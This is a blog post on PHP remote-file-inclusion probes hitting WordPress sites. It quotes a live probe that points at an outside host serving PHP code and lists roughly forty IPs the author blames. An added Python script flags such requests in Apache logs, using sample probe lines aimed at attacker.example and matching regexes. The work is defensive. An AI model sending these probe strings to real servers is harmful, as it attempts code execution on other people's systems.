Since deploying a number of WordPress sites I have noticed a number of attempted attacks targeted against PHP. While the majority of these attempts are crude and fail, there is still the possibility that these fruitless attempts are merely feelers designed to test the security of the system.
One of the more common attempts takes the form of
_SERVER[DOCUMENT_ROOT]=http://aboutav.com//o/id1.txt???
which appears to be an attempt to overwrite a PHP superglobal ($_SERVER['DOCUMENT_ROOT']) through the query string, so that a script which includes files relative to the document root would instead fetch and run the PHP code contained in the supplied URL. This only works on a server that has PHP's register_globals enabled and a script that includes files without validating the path. You can view this script by plugging the URL into your browser.
Our logs indicate that these attempts result in 301 redirects to the home page or in a 404 error. Although these attempts appear to be harmless, I am obviously not too happy about them, so I am actively monitoring these requests for inclusion in our Apache global deny configuration file. For your convenience I have enumerated the offending IPs in this post.
- 211.234.100.46(211.234.100.46) Korea, Republic of
- 222.122.72.216(222.122.72.216) Korea, Republic of
- 211.227.241.149(211.227.241.149) Korea, Republic of
- 61.110.18.100(61.110.18.100) Korea, Republic of
- 222.122.72.216(222.122.72.216) Korea, Republic of
- client.superb.net(207.103.6.100) United States
- 211.239.157.203(211.239.157.203) Korea, Republic of
- 204.30.3.225(204.30.3.225) United States
- 85.25.236.152(85.25.236.152) Germany
- saturn.usedns.com(78.111.80.234) Russian Federation
- 204.15.230.189(204.15.230.189) United States
- 69-64-84-44.dedicated.abac.net(69.64.84.44) United States
- cp105.agava.net(89.108.67.95) Russian Federation
- 114.4.8.14(114.4.8.14) Indonesia
- 123.142.108.142(123.142.108.142) Korea, Republic of
- 82.195.150.228(82.195.150.228) Ireland
- correo.ccimarketplace.com(216.234.246.153) United States
- 2.sollink.net(65.18.168.84) United States
- at193.name4you.net(89.104.70.15) Russian Federation
- 117.110.59.2(117.110.59.2) Korea, Republic of
- ns.sun-nsk.ru(217.117.85.108) Russian Federation
- 72.11.145.8(72.11.145.8) United States
- 69-64-84-44.dedicated.abac.net(69.64.84.44) United States
- 118.107.163.230(118.107.163.230) Korea, Republic of
- 211.189.18.73(211.189.18.73) Korea, Republic of
- server.cityoffers.de(62.116.137.99) Germany
- webhostp1.ascogroup.it(151.8.79.19) Italy
- nostromo.blazearts.hu(81.2.253.202) Hungary
- host.prodimark.com(74.200.89.25) United States
- client.superb.net(207.103.6.100) United States
- 74.223.143.131.nw.nuvox.net(74.223.143.131) United States
- www.ebel.com.br(204.3.129.73) United States
- 69-64-84-44.dedicated.abac.net(69.64.84.44) United States
- 212186220246.teleweb.at(212.186.220.246) Austria
- sded3.atcihosting.com(206.225.23.4) United States
- 74.50.85.104(74.50.85.104) United States
- 211.75.220.49(211.75.220.49) Taiwan
- linhost01.turknetserver.com(193.192.122.30) Turkey
- sataweb.sata.com.sg(203.126.23.51) Singapore
- labor.allegri.unimo.it(155.185.215.15) Italy
- 59.27.95.144(59.27.95.144) Korea, Republic of
While these are just a few of the offending IPs, our quest to identify and eliminate them continues.
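As an added example (not part of the original post, and not a tool the author describes), the following Python script automates the monitoring described above: it parses Apache combined-format access log lines, flags requests whose query string either names a PHP superglobal as a parameter key (the `_SERVER[DOCUMENT_ROOT]=` pattern quoted in the post) or passes an absolute URL as a parameter value (the generic remote-file-inclusion shape), collects the client IPs, and renders them as an Apache 2.4 `Require not ip` block for a global deny file. The log lines, the `attacker.example` host and all IP addresses are constructed sample data; the detection regexes and the deny-block layout are the assumptions this example makes.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format (not real traffic).
# Lines 1 and 3 carry the superglobal-overwrite probe from the post (line 3
# URL-encodes the brackets); line 2 is a generic remote-URL-in-query probe;
# lines 4 and 5 are ordinary WordPress traffic that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2010:13:55:36 +0000] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://attacker.example//o/id1.txt??? HTTP/1.1" 301 412 "-" "Mozilla/4.0"
198.51.100.23 - - [10/Oct/2010:13:57:01 +0000] "GET /wp-content/themes/x/page.php?path=http://attacker.example/shell.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.8"
203.0.113.7 - - [10/Oct/2010:13:58:44 +0000] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://attacker.example/id1.txt HTTP/1.1" 404 210 "-" "Mozilla/4.0"
192.0.2.55 - - [10/Oct/2010:14:01:12 +0000] "GET /?p=42 HTTP/1.1" 200 8124 "http://example.org/" "Mozilla/5.0"
192.0.2.55 - - [10/Oct/2010:14:01:13 +0000] "GET /wp-content/uploads/a.png HTTP/1.1" 200 5012 "http://example.org/" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Pattern 1: a PHP superglobal used as a query-string key. With register_globals
# enabled this would overwrite the array entry inside the script.
SUPERGLOBAL_RE = re.compile(
    r'(?:^|[?&])(?:_SERVER|_GET|_POST|_COOKIE|_REQUEST|_ENV|_FILES|GLOBALS)\[', re.I
)
# Pattern 2: any query parameter whose value is an absolute URL, the shape of a
# remote file inclusion probe regardless of which parameter name is used.
REMOTE_URL_RE = re.compile(r'[?&][^=&]*=(?:https?|ftp)://', re.I)


def classify(target):
    """Return the list of reasons a request target looks like an RFI probe."""
    decoded = unquote(target)  # %5B -> [ so encoded variants are caught too
    reasons = []
    if SUPERGLOBAL_RE.search(decoded):
        reasons.append("superglobal-overwrite")
    if REMOTE_URL_RE.search(decoded):
        reasons.append("remote-url-in-query")
    return reasons


def scan_log(text):
    """Parse combined-format lines and return one record per suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        reasons = classify(m["target"])
        if reasons:
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": int(m["status"]),
                "target": m["target"],
                "reasons": reasons,
            })
    return hits


def offending_ips(hits):
    """Unique client IPs from the hits, in first-seen order."""
    return list(dict.fromkeys(h["ip"] for h in hits))


def apache_deny_block(ips):
    """Render an Apache 2.4 block that denies the given IPs and allows everyone else."""
    lines = ["<RequireAll>", "    Require all granted"]
    lines += [f"    Require not ip {ip}" for ip in ips]
    lines.append("</RequireAll>")
    return "\n".join(lines)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h['ip']:15} {h['status']} {','.join(h['reasons']):40} {h['target']}")
    print(apache_deny_block(offending_ips(found)))
```

The 301 and 404 responses the post reports mean the probes hit no vulnerable include, but the status code is not what makes a site safe: register_globals (off by default since PHP 4.2 and removed in PHP 5.4) and unvalidated include paths are. The deny block above is for Apache 2.4; on Apache 2.2 the equivalent is an `Order allow,deny` / `Allow from all` / `Deny from <ip>` sequence.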